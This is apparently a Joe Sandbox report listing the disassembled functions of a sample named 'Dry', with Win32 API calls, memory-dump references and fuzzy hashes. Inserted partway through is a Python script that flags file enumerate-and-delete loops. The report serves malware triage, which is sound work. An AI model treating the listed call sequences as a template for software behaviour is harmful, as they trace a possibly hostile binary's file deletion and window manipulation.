                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE668B,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE664A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AE665C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE663E: FreeLibrary.KERNEL32(00000000,?,?,00AE668B,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE666E
                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE66AB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B25657,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE6610
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AE6622
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE6607: FreeLibrary.KERNEL32(00000000,?,?,00B25657,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE6635
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
• Part of subcall function 00B14FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00B1319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00B15031
• _free.LIBCMT ref: 00B153DF
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
APIs
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00B5F987
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID:
• API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7c2a543c4a96b25bdbffc8c5324436206cfd5a7116a61445579eaec716c99274
                                                                                                                                                                                                                                                                                    • Instruction ID: 839bbfde9dec101ad16fe9bc58f2351cdbd3f461009965ce1d23f2059b84596e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c2a543c4a96b25bdbffc8c5324436206cfd5a7116a61445579eaec716c99274
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F08172600105BFCB01EBA5DC46E9EBBFCEF49710F004094F505AB261DA70EA45C750
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00B1319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00B15031
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a55fe2c60a42636a47b13dc645afb0d8ac4e7e852ca846f024736daa728ce479
                                                                                                                                                                                                                                                                                    • Instruction ID: ff1c6809774ff3bdf592e757c890cb3aaa5b5f3fda4c5c46cb6061fe083f42de
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a55fe2c60a42636a47b13dc645afb0d8ac4e7e852ca846f024736daa728ce479
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F0B432610E24EBDB311AA69C09B9B3BD8EFC47E0F554091B804A70A0DA60D98186E4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00B06A79,?,0000015D,?,?,?,?,00B085B0,000000FF,00000000,?,?), ref: 00B13BC5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ae963a980a0fbdd7a5f275e3de75a9c7d17ea2d74d6af22c2a7cfd987dd61c39
                                                                                                                                                                                                                                                                                    • Instruction ID: f39518826800bc719ae60f3196de4b3d9ea6a2a7c1654d0f7a6e814c3f20c066
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae963a980a0fbdd7a5f275e3de75a9c7d17ea2d74d6af22c2a7cfd987dd61c39
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEE0652124862166DA3127769C01BDB3AD8DF41BA4F9501E1EC05E79E1FF64DDC085A4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: acb92b1c7a8d589b7d078cce8702c89c370d7cf8ea6dbd3b2f4228f31cc9035f
                                                                                                                                                                                                                                                                                    • Instruction ID: d758548002399595d6376a87122604225443eec09be0694c1be1db90b7110d09
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: acb92b1c7a8d589b7d078cce8702c89c370d7cf8ea6dbd3b2f4228f31cc9035f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF015B1105792CFCB789F65E8A0816BBF4AF243693248D7EE5DA86A10C7319880DF10
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d3a051188a28de1a8c65a3f3ce14af78a16228520b332fcd535345d2ab6b9da4
                                                                                                                                                                                                                                                                                    • Instruction ID: 1825078c4b0ec1ce0818e6c0683839f049d6f4346f99c2ba64e5f247072ecfc5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3a051188a28de1a8c65a3f3ce14af78a16228520b332fcd535345d2ab6b9da4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15F0E571704205BAD7205BA89C497B1F7E8FB10314F2085AAE5D583181D7F254D497D1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
• Instruction ID: f19987c1807de24a095213ad546fbcc2df6fd56b2938b2a76d3a935dacd74ebf
• Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
• Instruction Fuzzy Hash: BEF0F87550020DFFDF05DF90C941EAE7BB9FB18318F208485F9159A151C336EA21ABA1
APIs
• Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AE3963
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
• Opcode ID: 8f220c758264099817b81a510ab83713984fcdc36e082d2481a7db6955ffbeef
• Instruction ID: 7da49785ce776a02fea304bb076e68fb236fa25a5ae1676e57e8af5e402dc64d
• Opcode Fuzzy Hash: 8f220c758264099817b81a510ab83713984fcdc36e082d2481a7db6955ffbeef
• Instruction Fuzzy Hash: AAF0A7709043049FEB539F24DC497967BFCA701708F0001E5A248A7282DBB44788CF45
APIs
• GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AE3A76
  • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
• Opcode ID: e951a6433648fb3fc7d4fedbd6b2208c910c290d8987de20f31f4bf9a184568c
• Instruction ID: 329fc2bfcf3cf7308a31fcd203effbc9531820f4fd8b479e7593119d665508c9
• Opcode Fuzzy Hash: e951a6433648fb3fc7d4fedbd6b2208c910c290d8987de20f31f4bf9a184568c
• Instruction Fuzzy Hash: 1EE08C72A002246BCB20A658AC06FEA77EDDF887A0F0440B5BC09D7258DD64AD8086A0
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,00B20A84,?,?,00000000,?,00B20A84,00000000,0000000C), ref: 00B20737
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: dc66f3d875f5d41d8134137a0a9cc71cbb035c27ebd95b8b67a393c2eb8a56f8
• Instruction ID: acf0e916b15847f76e7233462902a343a916736a119c7724385a4e8fa3b8a80f
• Opcode Fuzzy Hash: dc66f3d875f5d41d8134137a0a9cc71cbb035c27ebd95b8b67a393c2eb8a56f8
• Instruction Fuzzy Hash: E9D06C3200010DBBDF028F84DD06EDA3BAAFB48754F014050BE1866020C732E861AB90
APIs
• GetFileAttributesW.KERNEL32(?,00B4D840), ref: 00B4EAB1
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: e5a693a32de3da228499312fba08377526380e9e1e4700a24255ea5ee5a8e0ab
• Instruction ID: 5482537aba9beafc9a930d605a32b2e30a1fd109465c5c69f6dfda9dfbb36997
• Opcode Fuzzy Hash: e5a693a32de3da228499312fba08377526380e9e1e4700a24255ea5ee5a8e0ab
• Instruction Fuzzy Hash: 41B0922400060005AD380E389A099A93390B8423E57DC1FC0E479960F2C739C94FB950
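The function entries in this listing give each block's Win32 references, including ones the Joe Sandbox IDA plugin inherits from subcalls ("Part of subcall function ..."), but a dump this long is easier to triage by machine than by eye. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses entries in exactly the shape shown here (two constructed entries copied in that shape are embedded, so it runs offline) and flags any single function whose references show FindFirstFile, then DeleteFile, then FindNextFile in ascending call-site order, which is the enumerate-and-delete loop the next entry reports under subcall function 00B4DC54. The field names and line layout come from this page; the flagging rule is my own heuristic, not a sandbox signature, and the A/W suffix handling is an assumption about how other entries name their imports.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two function entries copied in the shape of the
# "APIs" / "Memory Dump Source" / "Similarity" listing on this page
# (leading whitespace and "Download File" link residue removed). Only the
# bullet lines under "APIs" and the "API ID" line are used by the parser.
SAMPLE = """\
APIs
• GetFileAttributesW.KERNEL32(?,00B4D840), ref: 00B4EAB1
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
  • Part of subcall function 00B4DC54: FindFirstFileW.KERNEL32(?,?), ref: 00B4DCCB
  • Part of subcall function 00B4DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00B4DD1B
  • Part of subcall function 00B4DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B4DD2C
  • Part of subcall function 00B4DC54: FindClose.KERNEL32(00000000), ref: 00B4DD43
• GetLastError.KERNEL32 ref: 00B5666E
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
"""

# One API bullet: optional "Part of subcall function <addr>: " prefix, then
# Name.MODULE, optional "(args)", optional comma, then " ref: <call site>".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
API_ID_RE = re.compile(r"^API ID: (?P<id>.*)$")


@dataclass
class ApiRef:
    name: str               # e.g. FindFirstFileW
    module: str             # e.g. KERNEL32
    args: str               # argument text as the report prints it; "?" is unresolved
    ref: int                # call-site address
    subcall: Optional[str]  # callee address when inherited from a subcall, else None


@dataclass
class Entry:
    apis: list = field(default_factory=list)
    api_id: str = ""        # the report's summary token, e.g. FileFind$CloseDeleteErrorFirstLastNext


def parse_entries(text: str) -> list:
    """Split the listing at each 'APIs' header and collect the API bullets of each entry."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiRef(name=m["name"], module=m["module"],
                                   args=m["args"] or "", ref=int(m["ref"], 16),
                                   subcall=m["sub"].upper() if m["sub"] else None))
            continue
        m = API_ID_RE.match(line)
        if m:
            cur.api_id = m["id"].strip()
    return entries


DELETE_LOOP = ("FindFirstFile", "DeleteFile", "FindNextFile")


def find_delete_loops(entries: list) -> list:
    """Return (api_id, function) for every entry in which one function (the entry's
    own code, reported as 'direct', or a subcall) references FindFirstFile, DeleteFile
    and FindNextFile in ascending call-site order: an enumerate-and-delete loop.
    The A/W suffix is dropped so ANSI and wide variants both match (assumption).
    Added heuristic, not a Joe Sandbox signature."""
    hits = []
    for e in entries:
        by_func = {}
        for a in e.apis:
            by_func.setdefault(a.subcall, []).append(a)
        for func, refs in by_func.items():
            first_site = {}
            for a in sorted(refs, key=lambda r: r.ref):
                first_site.setdefault(a.name.rstrip("AW"), a.ref)
            if all(k in first_site for k in DELETE_LOOP) and \
               first_site["FindFirstFile"] < first_site["DeleteFile"] < first_site["FindNextFile"]:
                hits.append((e.api_id, func or "direct"))
    return hits


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in parsed:
        print(e.api_id, "->", ", ".join(f"{a.name}@{a.ref:08X}" for a in e.apis))
    for api_id, func in find_delete_loops(parsed):
        print(f"enumerate-and-delete loop in function {func} (entry {api_id})")
```

To run it over the whole report, replace SAMPLE with the pasted text of the function listing; the parser ignores every line that is not an "APIs" header, an API bullet, or an "API ID" line, so the hashes and memory-dump lines need no cleanup first. Grouping by the subcall address rather than by entry matters: the same callee is inherited into many entries, and ordering by call-site address is what distinguishes a loop body from three unrelated references.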
APIs
  • Part of subcall function 00B4DC54: FindFirstFileW.KERNEL32(?,?), ref: 00B4DCCB
  • Part of subcall function 00B4DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00B4DD1B
  • Part of subcall function 00B4DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B4DD2C
  • Part of subcall function 00B4DC54: FindClose.KERNEL32(00000000), ref: 00B4DD43
• GetLastError.KERNEL32 ref: 00B5666E
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7f11a1a9a9c914aabd27d9f27ba8e10d0cc019691c458073ced7b340ded51405
                                                                                                                                                                                                                                                                                    • Instruction ID: 4cc74538d338162bc996d2073cfdfc91bf661c257350e037c6663ace32983ce7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f11a1a9a9c914aabd27d9f27ba8e10d0cc019691c458073ced7b340ded51405
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F0A0362002148FCB10EF59D955B6EB7E5EF88360F048449F90A9B352CB74FC01CB95
APIs
• GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00AFFC86
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3FCB8
• IsIconic.USER32(00000000), ref: 00B3FCC1
• ShowWindow.USER32(00000000,00000009), ref: 00B3FCCE
• SetForegroundWindow.USER32(00000000), ref: 00B3FCD8
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B3FCEE
• GetCurrentThreadId.KERNEL32 ref: 00B3FCF5
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B3FD01
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00B3FD12
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00B3FD1A
